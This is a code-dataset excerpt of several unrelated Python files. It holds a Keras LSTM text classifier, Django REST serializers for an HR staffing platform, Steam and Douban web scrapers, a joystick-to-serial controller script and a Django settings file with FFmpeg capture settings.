oov_token = \"OOV\") # Aquí pones el número de tokens junto al token que recibe las palabras fuera del vocabulario. Una cantidad demasiado grande de tokens puede hacer que se manejen mal palabras poco comunes.\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\n\nvocab_size = len(tokenizer.word_index) + 1\n\nprint(sentences_train[1])\nprint(X_train[1])\n\n# Generar el padding. 
Se pone al principio las palabras y luego se completa con ceros\nmaxlen = 50\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\nprint(X_train[2, :])\n\n\n# Definir arquitectura de la red y compilar el modelo\n\nmodel = Sequential()\nmodel.add(layers.Embedding(input_dim=vocab_size, \n output_dim=embedding_dim, \n input_length=maxlen))\nmodel.add(layers.Bidirectional(layers.LSTM(embedding_dim)))\nmodel.add(layers.Dense(embedding_dim, activation='relu'))\nmodel.add(layers.Dense(numero_de_labels, activation='softmax'))\n\n\nmodel.compile(optimizer=optimizador,\n loss=loss,\n metrics=['accuracy'])\nmodel.summary()\n\n\n# Entrenar el modelo \nhistory = model.fit(X_train, y_train,\n epochs = epochs,\n verbose=False,\n validation_split = 0.1,\n #validation_data=(X_test, y_test),\n batch_size = batch_size)\n \n \n# Train accuracy\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: {:.4f}\".format(accuracy))\n \nprint(history.history['val_accuracy'])\nprint(history.history['accuracy'])\n\n\n# Testear en datos que la red aún no ha visto\nprint(\"test accuracy\")\npredict = model.predict_classes(X_test, verbose=0)\n\n# Ordenar tabla de salida con las predicciones\npred_df = pd.DataFrame(predict, columns=['predicho']) \ny_test_df = pd.DataFrame(y_test, columns=['real']) \n#glosas = pd.DataFrame(sentences_test, columns=['glosa_original'])\npred_df2 = pd.concat([pred_df, y_test_df], axis=1, sort=False)\n\n# Mirar porcentaje de coincidencia\ncomparar = np.where(pred_df2[\"real\"] == pred_df2[\"predicho\"], True, False)\nprint(\"performance test data set\")\nprint(comparar.mean())\n\n\n \n# train and validation loss\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\nnumero_de_embeddings = str(embedding_dim)\nnumero_de_labels_string = str(numero_de_labels)\nperformance_test = str(comparar.mean())\nnombre_prueba = \"clasificador de ubicacion, Modelo \" + modelo_usado + \", performance test dataset \" + performance_test + \", optimizador \" + optimizador + \", labels \" + numero_de_labels_string # Aquí se nombra el JSON que entrega los resultados del modelo.\n\nx = sklearn.metrics.classification_report(y_test, predict, output_dict=True)\n\nimport json\n\nj = open(\"loss_models/\" + nombre_prueba + \".txt\", \"w\", encoding=\"utf-8\")\nj.write(json.dumps(x, ensure_ascii=False))\nj.close()\n\n\nmodel.save(\"models/lstm trata sequia o no, performance modelo \" + performance_test + \".h5\") # creates a HDF5 file 'my_model.h5'\ndel model # deletes the existing model\n\nimport pickle\n\n# saving\nwith open(\"tokenizer/token trata sequia o no, performance model\"+ performance_test +\".pickle\", 'wb') as handle:\n pickle.dump(tokenizer, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nfrom tensorflow.keras.models import load_model\n# import pickle\nmodel = load_model(\"models/lstm trata sequia o no, performance modelo \" + performance_test + \".h5\")\n\nprint(type(model))\n\n\n# loading\nwith open(\"tokenizer/token trata sequia o no, performance model\"+ performance_test +\".pickle\", 'rb') as handle:\n tokenizer = pickle.load(handle)\n\n\n# import numpy as np\nejemplo_de_frase = tokenizer.texts_to_sequences([\"hay muacha sequia en el mexico actual\"])\n\nprint(ejemplo_de_frase)\n\n# Generate predictions for samples\npredictions = model.predict(ejemplo_de_frase)\nprint(predictions)\n\n# Generate arg maxes for predictions\nclasses = np.argmax(predictions, axis = 
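# Illustrative sketch (hedged): the tokenize-then-pad pipeline above, run on
# toy data. Tokenizer reserves id 1 for the OOV token; pad_sequences with
# padding="post" right-pads with zeros so every row has length maxlen.
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences

tok = Tokenizer(num_words=1000, oov_token="OOV")
tok.fit_on_texts(["mucha sequia", "poca lluvia"])
seqs = tok.texts_to_sequences(["mucha sequia", "palabra_nueva sequia"])
print(pad_sequences(seqs, padding="post", maxlen=5))
# e.g. [[2 3 0 0 0]
#       [1 3 0 0 0]]  <- 1 is the OOV id standing in for the unseen word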
1)\nprint(classes)","sub_path":"clasificador trata sequia o no.py","file_name":"clasificador trata sequia o no.py","file_ext":"py","file_size_in_byte":7369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"607061100","text":"from rest_framework import serializers\nfrom myplatform.settings import URL_FRONT\nfrom sendmail.sendmail import SendMail\nfrom sms.models import InfoSms\nfrom backend.slack import slack_notify\nfrom .models import HrProfile, HrProfileCoWorker, HrSpecial, HrImage, HrFile, HrAccountInfo, HrFee\nfrom backend.models import (\n ComIdx, ComCode, User, Alarm\n)\nfrom backend.serializers import ComCodeSerializer, UserSimpleSerializer\nfrom company_profile.serializers import SugubReviewSerializer, SugubSerializer\n\nclass HrAccountInfoSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrAccountInfo\n fields = ['id', 'hrprofile', 'account_name', 'account_phone', 'account_email']\n read_only_fields = ['hrprofile']\n\n\nclass HrProfileCoworkerSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n user = serializers.CharField()\n hrprofile_auth = serializers.CharField()\n # hrprofile_auth = serializers.Serializer('backend.ComCodeSerializer')\n hrprofile_auth = ComCodeSerializer()\n coworker_phone = serializers.CharField()\n\n\nclass HrProfileCoWorkerModelSerializer(serializers.ModelSerializer):\n hrprofile_auth = ComCodeSerializer(read_only=True)\n # hrprofile_auth = serializers.Serializer('backend.ComCodeSerializer')\n hrprofile_auth_id = serializers.PrimaryKeyRelatedField(queryset=ComCode.objects.all())\n user = UserSimpleSerializer()\n # user = serializers.SerializerMethodField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d', read_only=True)\n\n class Meta:\n model = HrProfileCoWorker\n fields = ['id', 'hrprofile', 'user', 'hrprofile_auth', 'coworker_phone',\n 'created_time', 'hrprofile_auth_id']\n\n def update(self, instance, validated_data):\n instance.hrprofile_auth = validated_data.get('hrprofile_auth_id')\n instance.save()\n\n return instance\n\n\nclass HrSpecialSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_jikjong_top = ComCodeSerializer()\n # hr_jikjong_top = serializers.Serializer('backend.ComCodeSerializer')\n hr_jikjong_mid = ComCodeSerializer()\n # hr_jikjong_mid = serializers.Serializer('backend.serializers.ComCod11eSerializer')\n hr_jikjong_low = ComCodeSerializer(many=True)\n # hr_jikjong_low = serializers.Serializer('backend.ComCodeSerializer')\n jikjong_tax_start = serializers.CharField()\n jikjong_tax_end = serializers.CharField()\n\n\nclass HrFileSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_file = serializers.FileField()\n hr_filename = serializers.CharField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n\nclass HrImageSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n hr_image = serializers.FileField()\n hr_image_filename = serializers.CharField()\n created_time = serializers.DateTimeField(format='%Y-%m-%d %H:%M:%S')\n\n\nclass HrFeeModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrFee\n fields = '__all__'\n read_only_fields = ['hrprofile', ]\n\n\n# HR PROFILE\nclass HrProfileModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrProfile\n fields = '__all__'\n\n user = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n # since = serializers.IntegerField(allow_null=True, required=False, initial=0)\n 
address = serializers.PrimaryKeyRelatedField(read_only=True)\n # cmp_manager = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), allow_null=True, required=False)\n # cmp_manager = serializers.PrimaryKeyRelatedField(read_only=True)\n company_logo = serializers.FileField(read_only=True)\n hr_coworker = HrProfileCoworkerSerializer(many=True, read_only=True)\n hrspecial = HrSpecialSerializer(many=True, read_only=True)\n hrprofile_file = HrFileSerializer(many=True, read_only=True)\n hraccountinfo = HrAccountInfoSerializer(many=True, read_only=True)\n hrprofile_image = HrImageSerializer(many=True, read_only=True)\n\n # service_address = ComCodeSerializer(many=True, read_only=True)\n # services = ComCodeSerializer(many=True, read_only=True)\n\n hrfee = HrFeeModelSerializer(many=True, allow_null=True, required=False)\n\n def create(self, validated_data):\n print('validated_data', validated_data)\n user = self.context['request'].user\n # phone = validated_data.pop('phone', {})\n address_data = validated_data.pop('service_address', {})\n service_data = validated_data.pop('services', {})\n hrfee_data = validated_data.pop('hrfee', {})\n\n custid = validated_data.get('custid', None)\n\n if custid is not None:\n if HrProfile.objects.filter(custid=custid, status_cd='CB0200000').exists():\n hrprofile = HrProfile.objects.get(custid=custid, status_cd='CB0200000')\n created = False\n else:\n hrprofile = HrProfile.objects.create(**validated_data)\n created = True\n else:\n created = True\n hrprofile = HrProfile.objects.create(**validated_data)\n\n\n if hrfee_data != {}:\n for data in hrfee_data:\n HrFee.objects.create(hrprofile=hrprofile, **data)\n\n if address_data:\n for address in address_data:\n hrprofile.service_address.add(address)\n if service_data:\n for service in service_data:\n hrprofile.services.add(service)\n\n hrprofile.user.add(user)\n\n if created: # 신규등록이면 마스터 권한\n hr_instance = HrProfileCoWorker.objects.create(\n user=user, hrprofile=hrprofile,\n # coworker_phone=manager_phone,\n hrprofile_auth=ComCode.objects.get(code_id='CG0200000')\n )\n print('신규', hr_instance)\n else: # 이미 존재하면 기본 권한\n hr_instance = HrProfileCoWorker.objects.create(\n user=user, hrprofile=hrprofile,\n # coworker_phone=manager_phone,\n hrprofile_auth=ComCode.objects.get(code_id='CG0100000'))\n print('기존', hr_instance)\n\n hr_instance.save()\n\n '''\n Slack 알람\n '''\n text = '*[신규HR기업]* [_{}_]가 등록되었습니다.'.format(hrprofile.custname)\n slack_notify(text)\n\n '''\n HR 기업프로필 등록 시 메일 발송 ( 속도때문에 1명만 가도록 )\n '''\n # admin_email_list = User.objects.filter(is_admin=True, email='admin@chaema.co.kr').values('email')\n # for email in admin_email_list:\n # email_template = 'common/hrcompany_register'\n # email_address = email['email']\n # ctx = {\n # \"user\": validated_data.get('user', None)\n # }\n # SendMail(email_template, email_address, ctx)\n\n\n '''\n 관리자들에게 알람\n '''\n # admin_list = User.objects.filter(is_admin=True).values('id')\n # for receiver in admin_list:\n # alarm = Alarm(receiver=User(id=receiver['id']),\n # alarm_gubun=ComCode(code_id='ZE0300000'),\n # title='신규 HR 기업이 등록되었습니다.',\n # contents='새로운 HR 기업을 검토해주세요.\\n\\r')\n # alarm.save()\n\n\n '''\n 신규 기업 문자 알람 \n '''\n # for receiver in admin_list:\n # obj = User.objects.get(id=receiver['id'])\n # if obj.phone:\n # infosms = InfoSms.objects.create(\n # from_number=obj.phone,\n # to_number=obj.phone,\n # contents='신규 HR 기업이 등록되었습니다.'\n # )\n # infosms.save()\n\n\n return hrprofile\n\n def update(self, instance, validated_data):\n hrfee_data = 
validated_data.pop('hrfee', {})\n address_data = validated_data.pop('service_address', {})\n service_data = validated_data.pop('services', {})\n\n instance.service_address.set(address_data)\n instance.services.set(service_data)\n\n print('hrfee_data:', hrfee_data)\n if hrfee_data != {}:\n HrFee.objects.filter(hrprofile=instance).delete() #삭제 후 다시 등록..\n for data in hrfee_data:\n created = HrFee.objects.update_or_create(hrprofile=instance, **data)\n\n # 알림\n next_status = validated_data.get('status_cd', None)\n if instance.status_cd != next_status:\n # 검토 -> 승인\n if next_status == ComCode.objects.get(code_id='CB0200000'):\n ''' 파견사업주 알림 '''\n for receiver in instance.user.all():\n hr_alarm = Alarm(\n receiver=receiver,\n alarm_gubun=ComCode(code_id='ZE0300000'),\n title='파견사업주 파트너로 승인되었습니다.',\n contents='파견사업주 전용 관리페이지를 활용해주세요.',\n link_url=URL_FRONT + 'Mng/dashboard/'\n )\n hr_alarm.save()\n\n file_data = self.context['request'].FILES\n\n if file_data:\n company_logo = file_data.get('company_logo')\n hrprofile_file = file_data.get('hrprofile_file')\n hrprofile_image = file_data.get('hrprofile_image')\n\n if company_logo:\n instance.company_logo = company_logo\n if hrprofile_image:\n HrImage.objects.create(hrprofile=instance, hr_image=hrprofile_image)\n # HrImage.objects.get_or_create(hrprofile=instance, hr_image=hrprofile_image)\n if hrprofile_file:\n HrFile.objects.create(hrprofile=instance, hr_file=hrprofile_file)\n instance.save()\n\n instance = super(HrProfileModelSerializer, self).update(instance, validated_data)\n return instance\n\n def to_representation(self, instance):\n # data = super(HrProfileModelSerializer, self).to_representation(instance)\n data = HrProfileSerializer(instance).data\n # todo 주석 해제시 에러\n # if data['cmp_manager']:\n # data['cmp_manager'] = UserSimpleSerializer(instance.cmp_manager).data\n # if data['status_cd']:\n # data['status_cd'] = ComCodeSerializer(instance.status_cd).data\n # if data['services']:\n # temp_array = []\n # for service in data['services']:\n # temp_array.append(ComCode.objects.filter(code_id=service).values()[0])\n # data['services'] = temp_array\n # if data['service_address']:\n # temp_array = []\n # for address in data['service_address']:\n # temp_array.append(ComCode.objects.filter(code_id=address).values()[0])\n # data['service_address'] = temp_array\n\n return data\n\n\nclass HrProfileSimpleSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n cust_gubun = ComCodeSerializer()\n custname = serializers.CharField()\n custid = serializers.CharField(required=False)\n homepage = serializers.CharField(required=False)\n telno = serializers.CharField(required=False)\n faxno = serializers.CharField(required=False)\n emp_count = serializers.CharField(allow_null=True, allow_blank=True)\n gross_total = serializers.CharField(required=False)\n manager_email = serializers.CharField(required=False)\n manager_phone = serializers.CharField(required=False)\n introduce = serializers.CharField(required=False)\n hraccountinfo = HrAccountInfoSerializer(many=True, read_only=True)\n # cmp_manager = serializers.CharField()\n cmp_manager = UserSimpleSerializer()\n company_logo = serializers.FileField()\n load_addr_code = serializers.CharField(required=False)\n load_addr = serializers.CharField(required=False)\n load_addr_detail = serializers.CharField(required=False)\n hr_bokri = serializers.CharField(required=False)\n service_address = ComCodeSerializer(many=True)\n services = ComCodeSerializer(many=True)\n is_expose = 
serializers.BooleanField()\n is_partners = serializers.BooleanField()\n # address = serializers.Serializer('backend.ComCodeSerializer')\n status_cd = ComCodeSerializer()\n status_reason = serializers.CharField(required=False)\n # status_cd= serializers.Serializer('backend.ComCodeSerializer')\n\nclass PartnersSerializer(HrProfileSimpleSerializer):\n hrprofile_image = HrImageSerializer(many=True)\n hrprofile_file = HrFileSerializer(many=True)\n hrspecial = HrSpecialSerializer(many=True)\n hr_sugub_reviews = SugubReviewSerializer(many=True, read_only=True)\n resume_count = serializers.IntegerField(allow_null=True)\n jobad_count = serializers.IntegerField(allow_null=True)\n is_expose = serializers.BooleanField(read_only=True)\n is_partners = serializers.BooleanField(read_only=True)\n services = ComCodeSerializer(many=True)\n\n\nclass HrFeeSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n fee_gubun = ComCodeSerializer()\n start = serializers.IntegerField()\n end = serializers.IntegerField()\n fee_start = serializers.FloatField()\n fee_end = serializers.FloatField()\n\n\nclass HrProfileSerializer(HrProfileSimpleSerializer):\n hrprofile_image = HrImageSerializer(many=True)\n hrprofile_file = HrFileSerializer(many=True)\n # hrspecial = HrSpecialSerializer(many=True)\n hr_coworker = HrProfileCoworkerSerializer(many=True)\n hr_sugub_reviews = SugubReviewSerializer(many=True, read_only=True)\n resume_count = serializers.IntegerField(allow_null=True)\n jobad_count = serializers.IntegerField(allow_null=True)\n is_expose = serializers.BooleanField(read_only=True)\n is_partners = serializers.BooleanField(read_only=True)\n hrfee = HrFeeSerializer(many=True, read_only=True)\n\n\nclass HrSpecialModelSerializer(serializers.ModelSerializer):\n class Meta:\n model = HrSpecial\n fields = '__all__'\n unique_together = (('hrprofile', 'hr_jikjong_top', 'hr_jikjong_mid'),)\n read_only_fields = ('hrprofile', )\n\n # def validate(self, attrs):\n # print('attrs:', attrs)\n # raise serializers.ValidationError(\"최대 등록 갯수 초과\")\n","sub_path":"myplatform/hr_profile/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":14420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"456198460","text":"# 引用requests库\nimport requests\n# 引用BeautifulSoup库\nfrom bs4 import BeautifulSoup\n# 正则库\nimport re\n# csv读写\nimport csv\n# 定义请求头\nimport pandas as pd\n\n# 设置cookie(绕过成人认证)\ncookie = {\"Steam_Language\": \"chinese\", \"birthtime\": \"725817601\", \"lastagecheckage\": \"1-January-1993\"}\nheaders = {\n 'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36',\n 'Accept-Language': \"zh-CN,zh;q=0.9\"\n}\n\n# 文件路径\nfile = 'games.csv'\nsaveFile = \"indicators.csv\"\n\n\ndef getSteamUrl(file):\n list = []\n csv_reader = csv.reader(open(file, encoding='utf-8'))\n for row in csv_reader:\n list.append({\"name\": row[0], \"top\": row[1], \"url\": row[2]})\n # 去表头\n return list[1:]\n\n\ndef getGameType(data):\n type = []\n res_type = r'.*多人.*|.*合作.*|.*单人.*'\n for item in data:\n type = re.findall(res_type, str(item))\n if len(type) == 1:\n break\n if len(type) == 0:\n type = [\"其他\"]\n return type[0]\n\n\ndef isSupportChinese(data):\n support = []\n res_language = r'不支持'\n support = re.findall(res_language, str(data[1]))\n if len(support) == 0:\n return \"是\"\n return \"否\"\n\n\ndef getIndicators(data):\n list = []\n cnt = 0\n for game in data:\n cnt += 1\n 
print(cnt)\n name = game[\"name\"]\n steam_url = game[\"url\"]\n top = game[\"top\"]\n res_game = requests.get(steam_url, cookies=cookie, headers=headers)\n bs_game = BeautifulSoup(res_game.text, 'html.parser')\n # 内容主题/类型\n theme_list = []\n price_list = []\n res_a = r'(.*?)'\n themes_a = bs_game.find_all(\"a\", class_=\"app_tag\")\n themes = re.findall(res_a, str(themes_a), re.S)\n for item in themes:\n theme_list.append(item.strip())\n # 开发商\n dev_publisher = bs_game.find_all(\"div\", class_=\"dev_row\")\n # 有些游戏页面可能已经下线\n if len(bs_game.find_all(\"div\", class_=\"dev_row\")) < 2:\n continue\n dev = re.findall(res_a, str(dev_publisher[0]), re.S)\n # 发行商\n publisher = re.findall(res_a, str(dev_publisher[1]), re.S)\n # 收费\n price_div = bs_game.find(\"div\", class_=\"game_purchase_price price\")\n res_div = r'(.*?)
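# Illustrative sketch (hedged): the scraper above regex-matches the inner text
# of tags it has already parsed; since BeautifulSoup is in hand anyway, its
# get_text() method extracts the same strings without a second regex pass --
# an alternative technique, not the record's own approach.
from bs4 import BeautifulSoup

html = '<a class="app_tag">Action</a><a class="app_tag"> Indie </a>'
soup = BeautifulSoup(html, "html.parser")
tags = [a.get_text(strip=True) for a in soup.find_all("a", class_="app_tag")]
assert tags == ["Action", "Indie"]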
    '\n price = re.findall(res_div, str(price_div), re.S)\n for price_item in price:\n price_list.append(price_item.strip().replace(\"¥ \", \"\"))\n # 打折影响div标签, 重写匹配\n if len(price) == 0:\n price_div = bs_game.find(\"div\", class_=\"discount_original_price\")\n res_div = r'(.*?)'\n price = re.findall(res_div, str(price_div), re.S)\n for price_item in price:\n price_list.append(price_item.strip().replace(\"¥ \", \"\"))\n # 平台\n # 因为steam平台上没有手游,所以都是PC\n platform = \"PC\"\n # 性质\n # 从内容列表和网页标签里匹配\n category_div = bs_game.find_all('div', class_='game_area_details_specs')\n categorys = re.findall(res_a, str(category_div), re.S)\n category = getGameType(theme_list + categorys)\n # 是否支持中文\n language_list = bs_game.find_all('tr')\n is_support = isSupportChinese(language_list)\n\n list.append(\n {\"name\": name, \"theme\": \",\".join(theme_list), \"dev\": \",\".join(dev), \"publisher\": \",\".join(publisher),\n \"price\": \"\".join(price_list), \"platform\": platform, \"category\": category, \"is_support_chinese\": is_support,\n \"top\": top})\n writeToCsv(list)\n list.clear()\n return list\n\n\ndef writeToCsv(data):\n try:\n csv_file = open(saveFile, \"a\", newline='', encoding='utf-8')\n writer = csv.writer(csv_file)\n for game in data:\n print(game)\n writer.writerow(\n [game['name'], game['theme'], game['dev'], game['publisher'], game['price'], game['platform'],\n game['category'], game[\"is_support_chinese\"], game['top']])\n except IOError as e:\n print(e)\n\n\ncsvfile = open(saveFile, \"w\", newline='', encoding='utf-8')\nwriter = csv.writer(csvfile)\n# 表头\nwriter.writerow(('游戏名', '类型', '开发商', '发行商', '价格', '平台', '性质', '是否支持中文', '历史在线峰值'))\ncsvfile.close()\n\n\n# 所有游戏列表以及指标\n# game_list = getIndicators(getSteamUrl(file))\n# 写入csv\n\ndef main():\n # writeToCsv(game_list)\n getIndicators(getSteamUrl(file))\n\n\nif __name__ == '__main__':\n main()","sub_path":"爬取指标/getIndicators.py","file_name":"getIndicators.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"580970120","text":"import pygame\nimport serial\n\npygame.init()\npygame.joystick.init()\ndone = False\n\nPORT = \"COM5\" \n\nserial_port = serial.Serial(PORT,115200)\nserial_port.close()\nserial_port.open()\n\ncontrol = 0\nprev_control = control\nPWM = 1\nx_horizontal = 0\ny_horizontal = 0\nx_vertical = 0\ny_vertical = 0\neps = 1e-3\n\nwhile not done:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tdone = True\n\t\n\tjoystick = pygame.joystick.Joystick(0)\n\tjoystick.init()\n\taxes = joystick.get_numaxes()\n\t\n\n\t# x_horizontal_curr = round(joystick.get_axis(0))\n\taxis0 = float(joystick.get_axis(0))\n\tif ((axis0 +1 ) < eps):\n\t\tx_horizontal_curr = 0\n\telif (axis0>-0.99 and axis0 <-0.2):\n\t\tx_horizontal_curr = 1\n\telif ((axis0 - 0) < eps):\n\t\tx_horizontal_curr = 2\n\telif (axis0>0.2 and axis0 < 0.99):\n\t\tx_horizontal_curr = 3\n\telif ((axis0 - 1)< eps):\n\t\tx_horizontal_curr = 4\n\ty_horizontal_curr = round(joystick.get_axis(1))\n\n\tx_vertical_curr = round(joystick.get_axis(3))\n\ty_vertical_curr = round(joystick.get_axis(4))\n\n\n\tcontrol_press_A = joystick.get_button(0)\n\tcontrol_press_B = joystick.get_button(1)\n\tcontrol_press_X = joystick.get_button(2)\n\tcontrol_press_Y = joystick.get_button(3)\n\tcontrol_val = control_press_A * 1 + control_press_B * 2 + control_press_X * 3 + control_press_Y * 4\n \n \n\t#PWM_L2_R2 = round(joystick.get_axis(2))\n\t#if PWM_L2_R2 < 0:\n\t#\tPWM_L2_R2 = 
0\n\tPWM_L1 = joystick.get_button(4)\n\tPWM_R1 = joystick.get_button(5)\n\t#PWM_val = PWM_L2_R2 * 1 + PWM_L1 * 3 + PWM_R1 * 4\n\tPWM_val = PWM_L1 * 3 + PWM_R1 * 4\n\n\n\tif x_horizontal != x_horizontal_curr or y_horizontal != y_horizontal_curr or x_vertical != x_vertical_curr or y_vertical != y_vertical_curr or (PWM_val != PWM and PWM_val != 0) or (control_val == 0 and prev_control != 0):\n\t\tx_horizontal = x_horizontal_curr\n\t\ty_horizontal = y_horizontal_curr\n\t\tx_vertical = x_vertical_curr\n\t\ty_vertical = y_vertical_curr\n\t\tcontrol = prev_control if prev_control!= 0 else 0\n\t\tPWM = PWM_val if PWM_val != 0 else PWM\n\t\t\n\t\tvalue = str(x_horizontal) + str(y_horizontal+1) + str(x_vertical+1) + str(y_vertical+1) + str(control) + str(PWM)\n\t\tserial_port.write(value.encode())\n\t\tprint(\"VAL:\", value)\n\t\tprint(\"X_horizontal : {}\".format(str(x_horizontal).encode()))\n\t\tprint(\"Y_horizontal : {}\".format(str(y_horizontal+1).encode()))\n\t\tprint(\"X_vertical : {}\".format(str(x_vertical+1).encode()))\n\t\tprint(\"Y_vertical : {}\".format(str(y_vertical+1).encode()))\n\t\tprint(\"Control : {}\".format(str(control).encode()))\n\t\tprint(\"PWM : {}\".format(str(PWM).encode()))\n\t\t\n\tprev_control = control_val\n\npygame.quit()\n","sub_path":"joystick_analog.py","file_name":"joystick_analog.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"548590642","text":"# coding=utf-8\r\n\r\nimport re\r\nimport urllib.request\r\ntop_urls = []\r\ntop_num = 1\r\nurl = \"https://movie.douban.com/top250?start=\"\r\nfor num in range(4):\r\n top_urls.append(url + str(num * 25))\r\n\r\n\r\nfor i in top_urls:\r\n html = urllib.request.urlopen(i).read().decode('utf-8')\r\n top_tag = re.compile(r'(.*)')\r\n title = re.findall(top_tag, html)\r\n print(title)\r\n for i in title:\r\n if i.find('/') == -1:\r\n print('Top' + str(top_num) + ' ' + i)\r\n top_num += 1\r\n","sub_path":"top100.py","file_name":"top100.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"583724023","text":"\"\"\"\nDjango settings for STEPIC_STUDIO project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\nTEMP_DIR = os.path.join(BASE_DIR, 'temp')\n\nLINUX_DIR = ''\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ''\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = False\n\nTEMPLATE_DEBUG = False\n\nALLOWED_HOSTS = []\n\nTEST = True\n\n# Capacity warnings low borders:\nWARNING_CAPACITY = 100 * 1024 * 1024 * 1024 # 100GB\nERROR_CAPACITY = 20 * 1024 * 1024 * 1024 # 20GB\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'raven.contrib.django.raven_compat',\n 'stepicstudio',\n)\n\nMIDDLEWARE_CLASSES = (\n 
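# Illustrative sketch (hedged): the serial frame built above is six
# single-digit fields concatenated into a fixed-width string, so the receiver
# can index it positionally; the +1 offsets shift the rounded -1..1 axes into
# the 0..2 digit range. pack_frame is a hypothetical helper for illustration.
def pack_frame(x_h, y_h, x_v, y_v, control, pwm):
    return ("%d%d%d%d%d%d" % (x_h, y_h + 1, x_v + 1, y_v + 1, control, pwm)).encode()

frame = pack_frame(2, 0, -1, 1, 0, 1)
assert frame == b"210201"
x_h, y_h, x_v, y_v, control, pwm = (int(c) for c in frame.decode())
assert (x_h, y_h - 1, x_v - 1, y_v - 1, control, pwm) == (2, 0, -1, 1, 0, 1)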
'raven.contrib.django.raven_compat.middleware.SentryResponseErrorIdMiddleware',\n 'raven.contrib.django.raven_compat.middleware.Sentry404CatchMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'stepicstudio.middleware.SetStorageCapacityMiddleware',\n 'stepicstudio.middleware.SetLastVisitMiddleware',\n)\n\nROOT_URLCONF = 'STEPIC_STUDIO.urls'\n\nWSGI_APPLICATION = 'STEPIC_STUDIO.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '',\n 'USER': '',\n 'PASSWORD': '',\n 'HOST': 'localhost',\n 'PORT': '5432',\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_ROOT = 'staticfiles'\nSTATIC_URL = '/static/'\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\nTEMPLATE_DIRS = {'stepicstudio/templates/', }\n\nUBUNTU_USERNAME = ''\nUBUNTU_PASSWORD = ''\n\nREST_FRAMEWORK = {\n\n 'PAGE_SIZE': 10\n}\n\nPROFESSOR_IP = '172.25.202.32'\n\n# Adobe PremierePro configuration\nADOBE_PPRO_PATH = ''\nADOBE_PPRO_CMD = '/C es.process'\n\n# FFMPEG configuration\nFFMPEG_PATH = r'D:\\VIDEO\\ffmpeg\\bin\\ffmpeg.exe'\nFFPROBE_RUN_PATH = r'D:\\VIDEO\\ffmpeg\\bin\\ffprobe.exe'\nFFMPEG_CMD_PART = r' -y -f dshow -video_size 1920x1080 -rtbufsize 1024M -framerate 25 -i video=\"Blackmagic WDM Capture\":audio=\"Blackmagic WDM Capture\" -codec:v libx264 -preset ultrafast -crf 17 '\n\nFFMPEG_TABLET_CMD = r'ffmpeg -f alsa -ac 2 -i pulse -f x11grab -r 24 -s 1920x1080 -i :0.0 ' \\\n '-pix_fmt yuv420p -vcodec libx264 -acodec pcm_s16le -preset 